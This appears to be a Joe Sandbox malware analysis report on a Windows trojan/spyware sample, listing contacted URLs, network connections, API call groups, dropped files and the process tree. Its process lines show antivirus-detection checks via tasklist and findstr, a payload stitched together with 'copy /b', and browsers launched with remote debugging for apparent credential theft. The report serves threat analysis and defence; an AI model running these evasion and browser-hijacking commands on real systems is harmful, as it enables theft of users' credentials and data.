Source: Vibrators.com, 0000000B.00000002.2508933737.000000000615F000.00000004.00000800.00020000.00000000.sdmp, Vibrators.com, 0000000B.00000002.2505005731.000000000372E000.00000004.00000800.00020000.00000000.sdmp, P8QIEK.11.dr	String found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://www.last.fm/
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://www.messenger.com
Source: Vibrators.com, 0000000B.00000002.2510816768.000000000630A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.HCe2hc5EPKfq
Source: Vibrators.com, 0000000B.00000002.2510816768.000000000630A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.oX6J3D7V9Efv
Source: Vibrators.com, 0000000B.00000002.2510816768.000000000630A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: Vibrators.com, 0000000B.00000002.2510816768.000000000630A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: Vibrators.com, 0000000B.00000002.2510816768.000000000630A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: Vibrators.com, 0000000B.00000002.2510816768.000000000630A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1&game
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1&item
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1&item=fl
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1&playInS
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://www.office.com
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://www.officeplus.cn/?sid=shoreline&endpoint=OPPC&source=OPCNshoreline
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true&auth=1
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true&auth=2
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true&auth=1
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true&auth=2
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://www.tiktok.com/
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://www.youtube.com
Source: chrome.exe, 0000000F.00000003.1943483741.000016CC0157C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/?feature=ytca
Source: chrome.exe, 0000000F.00000003.1943483741.000016CC0157C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/?feature=ytcaogl
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://y.music.163.com/m/

Source: unknown	Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49863
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49860
Source: unknown	Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49857
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49856
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49855
Source: unknown	Network traffic detected: HTTP traffic on port 49841 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49854
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49853
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49820 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49837 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49850
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49855 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49846
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 49869 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49842
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49841
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49840
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49850 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49839
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49838
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49837
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49835
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown	Network traffic detected: HTTP traffic on port 49839 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49677 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49856 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49853 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49827
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49820
Source: unknown	Network traffic detected: HTTP traffic on port 49842 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49676 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49871 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49818
Source: unknown	Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49817
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49816
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49815
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 49816 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49827 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49802 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49809
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49806
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49805
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49804
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49803
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49802
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49801
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49800
Source: unknown	Network traffic detected: HTTP traffic on port 49838 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49863 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 49815 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49840 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49857 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49854 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49809 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49860 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49818 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49871
Source: unknown	Network traffic detected: HTTP traffic on port 49835 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49846 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49869
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 443

Source: unknown	HTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.9:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.9:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 94.130.191.168:443 -> 192.168.2.9:49710 version: TLS 1.2

Source: C:\Users\user\Desktop\QIo3SytSZA.exe

Code function: 0_2_004050F9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_004050F9

Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com

Code function: 11_2_00A6F7C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

11_2_00A6F7C7

Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com

Code function: 11_2_00A6F55C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

11_2_00A6F55C

Source: C:\Users\user\Desktop\QIo3SytSZA.exe

Code function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_004044D1

Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com

Code function: 11_2_00A89FD2 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

11_2_00A89FD2

Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com

Code function: 11_2_00A64763: GetFullPathNameW,_wcslen,CreateDirectoryW,CreateFileW,RemoveDirectoryW,DeviceIoControl,CloseHandle,CloseHandle,

11_2_00A64763

Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com

Code function: 11_2_00A51B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

11_2_00A51B4D

Source: C:\Users\user\Desktop\QIo3SytSZA.exe	Code function: 0_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,		0_2_004038AF
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	Code function: 11_2_00A5F20D ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,		11_2_00A5F20D

Source: C:\Users\user\Desktop\QIo3SytSZA.exe	File created: C:\Windows\InstructionsTeaching	Jump to behavior
Source: C:\Users\user\Desktop\QIo3SytSZA.exe	File created: C:\Windows\AttemptedPresents	Jump to behavior
Source: C:\Users\user\Desktop\QIo3SytSZA.exe	File created: C:\Windows\DaveProtected	Jump to behavior
Source: C:\Users\user\Desktop\QIo3SytSZA.exe	File created: C:\Windows\PersonallySullivan	Jump to behavior
Source: C:\Users\user\Desktop\QIo3SytSZA.exe	File created: C:\Windows\DeeplyUnlimited	Jump to behavior
Source: C:\Users\user\Desktop\QIo3SytSZA.exe	File created: C:\Windows\PornoVintage	Jump to behavior
Source: C:\Users\user\Desktop\QIo3SytSZA.exe	File created: C:\Windows\ChanceDark	Jump to behavior

Source: C:\Users\user\Desktop\QIo3SytSZA.exe	Code function: 0_2_0040737E	0_2_0040737E
Source: C:\Users\user\Desktop\QIo3SytSZA.exe	Code function: 0_2_00406EFE	0_2_00406EFE
Source: C:\Users\user\Desktop\QIo3SytSZA.exe	Code function: 0_2_004079A2	0_2_004079A2
Source: C:\Users\user\Desktop\QIo3SytSZA.exe	Code function: 0_2_004049A8	0_2_004049A8
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	Code function: 11_2_00A18017	11_2_00A18017
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	Code function: 11_2_009FE1F0	11_2_009FE1F0
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	Code function: 11_2_00A0E144	11_2_00A0E144
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	Code function: 11_2_00A122A2	11_2_00A122A2
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	Code function: 11_2_009F22AD	11_2_009F22AD
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	Code function: 11_2_00A2A26E	11_2_00A2A26E
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	Code function: 11_2_00A0C624	11_2_00A0C624
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	Code function: 11_2_00A7C8A4	11_2_00A7C8A4
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	Code function: 11_2_00A2E87F	11_2_00A2E87F
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	Code function: 11_2_00A26ADE	11_2_00A26ADE
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	Code function: 11_2_00A62A05	11_2_00A62A05
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	Code function: 11_2_00A58BFF	11_2_00A58BFF
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	Code function: 11_2_00A0CD7A	11_2_00A0CD7A
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	Code function: 11_2_00A1CE10	11_2_00A1CE10
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	Code function: 11_2_00A27159	11_2_00A27159
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	Code function: 11_2_009F9240	11_2_009F9240
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	Code function: 11_2_00A85311	11_2_00A85311
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	Code function: 11_2_009F96E0	11_2_009F96E0
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	Code function: 11_2_00A11704	11_2_00A11704
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	Code function: 11_2_00A11A76	11_2_00A11A76
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	Code function: 11_2_00A17B8B	11_2_00A17B8B
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	Code function: 11_2_009F9B60	11_2_009F9B60
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	Code function: 11_2_00A17DBA	11_2_00A17DBA
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	Code function: 11_2_00A11D20	11_2_00A11D20
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	Code function: 11_2_00A11FE7	11_2_00A11FE7

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49

Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	Code function: String function: 00A10DA0 appears 46 times
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	Code function: String function: 00A0FD52 appears 40 times
Source: C:\Users\user\Desktop\QIo3SytSZA.exe	Code function: String function: 004062CF appears 58 times

Source: QIo3SytSZA.exe

Static PE information: invalid certificate

Source: QIo3SytSZA.exe, 00000000.00000002.1394013294.0000000000713000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCmd.Exej% vs QIo3SytSZA.exe
Source: QIo3SytSZA.exe, 00000000.00000003.1392781679.0000000000713000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCmd.Exej% vs QIo3SytSZA.exe

Source: QIo3SytSZA.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@98/299@27/16

Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com

Code function: 11_2_00A641FA GetLastError,FormatMessageW,

11_2_00A641FA

Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	Code function: 11_2_00A52010 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		11_2_00A52010
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	Code function: 11_2_00A51A0B AdjustTokenPrivileges,CloseHandle,		11_2_00A51A0B

Source: C:\Users\user\Desktop\QIo3SytSZA.exe

0_2_004044D1

Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com

Code function: 11_2_00A5DD87 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

11_2_00A5DD87

Source: C:\Users\user\Desktop\QIo3SytSZA.exe

Code function: 0_2_004024FB CoCreateInstance,

0_2_004024FB

Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com

Code function: 11_2_00A63A0E CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

11_2_00A63A0E

Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\7O0XP2EX.htm

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7648:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5612:120:WilError_03

Source: C:\Users\user\Desktop\QIo3SytSZA.exe

File created: C:\Users\user\AppData\Local\Temp\nsr729B.tmp

Jump to behavior

Source: QIo3SytSZA.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\findstr.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Family,VirtualizationFirmwareEnabled FROM Win32_Processor

Source: C:\Users\user\Desktop\QIo3SytSZA.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\QIo3SytSZA.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 5XT00ZUAA.11.dr, AS268YUKF.11.dr

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: QIo3SytSZA.exe

ReversingLabs: Detection: 31%

Source: C:\Users\user\Desktop\QIo3SytSZA.exe

File read: C:\Users\user\Desktop\QIo3SytSZA.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\QIo3SytSZA.exe "C:\Users\user\Desktop\QIo3SytSZA.exe"
Source: C:\Users\user\Desktop\QIo3SytSZA.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Adjacent Adjacent.cmd & Adjacent.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 415434
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "Analyze" Arabic
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Reflected + ..\Subdivision + ..\Change + ..\Checked o
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com Vibrators.com o
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2252 --field-trial-handle=1988,i,7571485263199981070,11501263835013036309,262144 /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2812 --field-trial-handle=2520,i,303125913703440342,5402026303497311183,262144 /prefetch:3
